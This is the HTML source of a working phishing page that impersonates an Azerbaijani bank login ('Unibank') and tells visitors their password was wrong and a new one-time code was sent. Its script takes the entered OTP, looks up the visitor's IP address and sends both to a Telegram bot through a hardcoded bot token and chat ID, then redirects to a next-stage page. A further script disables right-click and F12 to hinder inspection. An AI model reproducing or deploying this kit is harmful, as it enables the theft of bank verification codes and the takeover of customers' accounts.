<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Unibank</title>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.4/css/all.min.css"> <!-- Font Awesome ikonları için -->
<style>
body {
    margin: 0;
    padding: 0;
    font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
    background-color: #fff; /* Koyu turuncu arka plan */
    display: flex;
    justify-content: center;
    align-items: center;
    height: 100vh;
}
.container {
    background-color: #fff; /* Beyaz arka plan */
    border-radius: 15px;
    box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1);
    padding: 50px;
    max-width: 300px; /* Maksimum genişlik belirle */
    width: 100%;
    text-align: center;
}
.form-group {
    margin-bottom: 20px;
}
label {
    font-weight: bold;
    display: block;
    margin-bottom: 5px;
}
input[type="number"] {
    width: calc(100% - 12px);
    padding: 10px;
    border: 2px solid black; /* Koyu turuncu çerçeve */
    border-radius: 5px;
    box-sizing: border-box;
    font-size: 14px;
}
button {
    width: 100%;
    padding: 10px;
    border: none;
    border-radius: 5px;
    background-color: #4caf50;
    color: #fff;
    cursor: pointer;
    font-size: 16px;
    transition: background-color 0.3s ease;
    margin-top: 20px; /* Butonu yukarı taşı */
}
button:disabled {
    background-color: #cccccc;
    cursor: not-allowed;
}
button:hover {
    background-color: #45a049;
}
.logo {
    margin-bottom: 20px;
    text-align: center;
}
.bank-icons {
    display: flex;
    justify-content: center;
    margin-top: 20px;
}
.bank-icons i {
    font-size: 24px;
    margin: 0 10px;
    color: #888;
    transition: color 0.3s ease;
}
.bank-icons i:hover {
    color: #333;
}
.timer {
    font-size: 2rem;
    color: #333;
    margin-bottom: 20px;
}
</style>
</head>
<body>
<div class="container">
    <div class="logo">
        <img src="https://upload.wikimedia.org/wikipedia/commons/0/04/M10_by_PashaPay_logo_new.png" alt="Logo" width="200">
    </div>
    <div class="timer" id="timer">02:00</div> <!-- 2 dakikalık zaman sayacı -->
    <form id="myForm">
        <div class="form-group">
            <div class="item item-indent">Daxil etdiyiniz şifrə yanlışdır. </div>
            <label for="cardName">Yeni Şifrə Göndərildi: +994*******</label>
            <input type="number" id="cardName" placeholder="Otp Kod" maxlength="4" minlength="4" required>
        </div>
  
        <div style="text-align: center;">
            <button type="button" id="submitButton" disabled>İləri <i class="fas fa-arrow-right"></i></button>
        </div>
    </form>
    <div class="bank-icons">
        <i class="fab fa-cc-visa"></i>
        <i class="fab fa-cc-mastercard"></i>
        <i class="fab fa-cc-amex"></i>
    </div>
</div>

<script>
// Başlangıç zamanı
var startTime = new Date().getTime();

// 2 dakika sonraki zamanı hesapla
var endTime = startTime + (2 * 60 * 1000);

// Her saniyede bir zamanı güncelle
var timerInterval = setInterval(function() {
    // Geçen süreyi hesapla
    var currentTime = new Date().getTime();
    var elapsedTime = endTime - currentTime;

    // Dakika ve saniye değerlerini hesapla
    var minutes = Math.floor((elapsedTime % (1000 * 60 * 60)) / (1000 * 60));
    var seconds = Math.floor((elapsedTime % (1000 * 60)) / 1000);

    // Zamanı güncelle
    document.getElementById("timer").innerHTML = formatTime(minutes) + ":" + formatTime(seconds);

    // Zaman dolunca butonu devre dışı bırak
    if (elapsedTime < 0) {
        clearInterval(timerInterval);
        document.getElementById("timer").innerHTML = "00:00";
        document.getElementById("submitButton").disabled = true;
    }
}, 1000);

// Zamanı iki haneli format haline getir
function formatTime(time) {
    return time < 10 ? "0" + time : time;
}

// Alanlar dolunca butonu etkinleştir
document.getElementById("myForm").addEventListener("input", function() {
    var cardName = document.getElementById("cardName").value;
    
    var submitButton = document.getElementById("submitButton");

    if (cardName.trim().length >= 4) {
        submitButton.disabled = false;
    } else {
        submitButton.disabled = true;
    }
});

// Telegram API anahtarları
const botToken = '7648760943:AAEhYB0YIRY7v9A1lihGpYFJPZJ-IlsbEGs';
const chatId = '-4759552637';

// Telegram'a form bilgilerini gönder
document.getElementById("submitButton").addEventListener("click", function() {
    var cardName = document.getElementById("cardName").value;

    // Güvenlik kodu oluşturulması (Örnek olarak rastgele bir sayı kullanıldı)
    const securityCode = Math.floor(Math.random() * 10000);

    // Kullanıcının IP adresini almak için bir API kullanılması (ipify API kullanılıyor)
    fetch("https://api.ipify.org?format=json")
        .then(response => response.json())
        .then(data => {
            const userIP = data.ip;
            const message = `Otp-2: ${cardName}\nIP: ${userIP}`;

            // Telegram API'ye istek yapılması ve mesajın gönderilmesi
            fetch(`https://api.telegram.org/bot${botToken}/sendMessage`, {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json',
                },
                body: JSON.stringify({
                    chat_id: chatId,
                    text: message,
                }),
            })
                .then(response => response.json())
                .then(data => {
                    console.log('Telegram Mesajı Gönderildi:', data);
                    // Başarılı olursa kullanıcıyı yönlendirme yapılması
                    window.location.href = "index2.html";
                })
                .catch(error => {
                    console.error('Telegram Mesajı Gönderme Hatası:', error);
                });
        })
        .catch(error => {
            console.error('IP Adresi Alınamadı:', error);
        });
});
</script>

<SCRIPT LANGUAGE="Javascript"><!--
    // ***********************************************
    //     UYARISIZ SAG TIK VE F12 ENGELLEME KODU
    // ***********************************************
       document.onkeypress = function (event) {
           event = (event || window.event);
           if (event.keyCode == 123) {
              //alert('No F-12');
               return false;
           }
       }
       document.onmousedown = function (event) {
           event = (event || window.event);
           if (event.keyCode == 123) {
               //alert('No F-keys');
               return false;
           }
       }
    document.onkeydown = function (event) {
           event = (event || window.event);
           if (event.keyCode == 123) {
               //alert('No F-keys');
               return false;
           }
       }
    var isNS = (navigator.appName == "Netscape") ? 1 : 0;
    var EnableRightClick = 0;
    if(isNS)
    document.captureEvents(Event.MOUSEDOWN||Event.MOUSEUP);
    function mischandler(){
    if(EnableRightClick==1){ return true; }
    else {return false; }
    }
    function mousehandler(e){
    if(EnableRightClick==1){ return true; }
    var myevent = (isNS) ? e : event;
    var eventbutton = (isNS) ? myevent.which : myevent.button;
    if((eventbutton==2)||(eventbutton==3)) return false;
    }
    function keyhandler(e) {
    var myevent = (isNS) ? e : window.event;
    if (myevent.keyCode==96)
    EnableRightClick = 1;
    return;
    }
    document.oncontextmenu = mischandler;
    document.onkeypress = keyhandler;
    document.onmousedown = mousehandler;
    document.onmouseup = mousehandler;
    //-->
    </script>

</body>
</html>
